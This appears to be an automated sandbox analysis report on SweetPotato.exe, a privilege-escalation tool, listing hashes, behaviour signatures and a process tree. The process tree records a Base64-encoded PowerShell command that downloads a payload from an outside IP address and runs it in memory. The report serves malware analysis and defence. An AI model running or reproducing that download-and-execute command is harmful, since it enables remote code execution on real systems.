Analysis

  • max time kernel
    143s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20230915-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    05/10/2023, 05:41

General

  • Target

    SweetPotato.exe

  • Size

    903KB

  • MD5

    f293d4c7f3a17eb84230caed9427584a

  • SHA1

    4041b704ad897b1bf1c86fc7d6d2937f0033467b

  • SHA256

    b9fb27d68786f8b8db534c02decf1a61b72363b41f14bde82a7b587d59e5875a

  • SHA512

    3948020a7c5dfb17dad5bb3011891c5ec567aef0a1913d3d8037929d8d1e51516d014650a99f7a4896f346525eeff8fea100bdf2a24d47f9dcb5cf04173a6c4d

  • SSDEEP

    24576:WrmXJcY5G1FOPjWcjL8TxNYqEv0rODHZ/lpWUmJKfplz7FkJpj:Wrm5cY56OaccTtsWIZ/GUm0fpB7

Score
5/10

Malware Config

Signatures

  • Drops file in System32 directory 2 IoCs
  • Modifies data under HKEY_USERS 41 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SweetPotato.exe
    "C:\Users\Admin\AppData\Local\Temp\SweetPotato.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:4016
    • \??\c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e WwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoAGkAdwByACAALQB1AHIAaQAgAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADUAMwAuADcANgAuADEANwA2AC8AYgBmAHQAZQBzAHQAMwAuAHQAeAB0ACkALgBjAG8AbgB0AGUAbgB0ACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAbgB1AGwAbAApACAAPgAgAEMAOgBcAFUAcwBlAHIAcwBcAEkATgBGAEEAMAAwADEAQQBcAGIAZgBzAGEAZgBlAGMAYQB0AC4AdAB4AHQACgA=
      2⤵
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1548

Network

Downloads

  • C:\Windows\Temp\__PSScriptPolicyTest_kl1clud0.a3v.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1548-6-0x00007FFE44BF0000-0x00007FFE456B1000-memory.dmp

    Filesize

    10.8MB

  • memory/1548-7-0x000001AA72CA0000-0x000001AA72CB0000-memory.dmp

    Filesize

    64KB

  • memory/1548-9-0x000001AA75460000-0x000001AA75482000-memory.dmp

    Filesize

    136KB

  • memory/1548-8-0x000001AA72CA0000-0x000001AA72CB0000-memory.dmp

    Filesize

    64KB

  • memory/1548-21-0x00007FFE44BF0000-0x00007FFE456B1000-memory.dmp

    Filesize

    10.8MB

  • memory/4016-0-0x0000014AE6320000-0x0000014AE6406000-memory.dmp

    Filesize

    920KB

  • memory/4016-1-0x00007FFE44BF0000-0x00007FFE456B1000-memory.dmp

    Filesize

    10.8MB

  • memory/4016-3-0x0000014AE8AD0000-0x0000014AE8D82000-memory.dmp

    Filesize

    2.7MB

  • memory/4016-2-0x0000014AE8370000-0x0000014AE8380000-memory.dmp

    Filesize

    64KB

  • memory/4016-5-0x00007FFE44BF0000-0x00007FFE456B1000-memory.dmp

    Filesize

    10.8MB